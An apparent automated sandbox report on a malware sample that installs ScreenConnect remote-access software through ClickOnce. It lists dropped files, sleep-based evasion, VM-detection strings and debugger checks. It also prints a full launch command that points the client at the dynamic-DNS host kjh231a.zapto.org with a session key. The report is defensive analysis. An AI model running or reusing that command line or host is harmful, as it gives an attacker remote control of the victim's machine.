                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe TID: 7612Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599764s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599122s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -598515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -598211s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -598091s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597935s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597827s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597711s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597607s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597275s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597171s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597062s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596952s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596842s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596624s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596514s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596396s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596155s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596045s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595928s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595627s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595498s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595263s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595155s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595045s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594936s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594826s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594608s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594499s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594280s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594165s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594061s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593952s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593843s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593731s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593621s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593405s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593296s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593186s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593069s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -592963s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7968Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 6788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 6044Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 340Thread sleep count: 218 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 340Thread sleep count: 80 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 7112Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB4A4B FindFirstFileExA,0_2_00BB4A4B
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\Jump to behavior
                  Source: Amcache.hve.6.dr Binary or memory string: VMware
                  Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
                  Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000002.00000002.2256734540.00000276A4261000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2252252771.00000276A2AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2610724033.0000025CF7A57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608059765.000001CEA28D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1790695435.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: svchost.exe, 00000008.00000002.2608059765.000001CEA28D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXT+SQlVMWare
                  Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: svchost.exe, 00000007.00000002.2608211921.0000025CF242B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
                  Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BB191F
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00BB1000
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB3677 mov eax, dword ptr fs:[00000030h]0_2_00BB3677
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB6893 GetProcessHeap,0_2_00BB6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BB1493
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BB191F
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BB4573
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe Code function: 0_2_00BB1AAC SetUnhandledExceptionFilter,0_2_00BB1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.cs Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\66zocdx0.3q8\r62k8zq0.mo3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%2520session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\66zocdx0.3q8\r62k8zq0.mo3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%2520session" "1"
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr; Binary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr; Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe; Code function: 0_2_00BB1BD4 cpuid 0_2_00BB1BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsClient.exe.config VolumeInformation
